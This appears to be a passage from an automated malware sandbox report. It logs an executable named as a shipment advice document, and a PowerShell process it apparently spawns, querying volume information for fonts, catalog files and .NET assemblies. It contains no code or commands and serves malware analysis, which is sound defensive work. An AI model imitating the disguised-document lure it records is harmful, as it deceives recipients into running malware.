                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
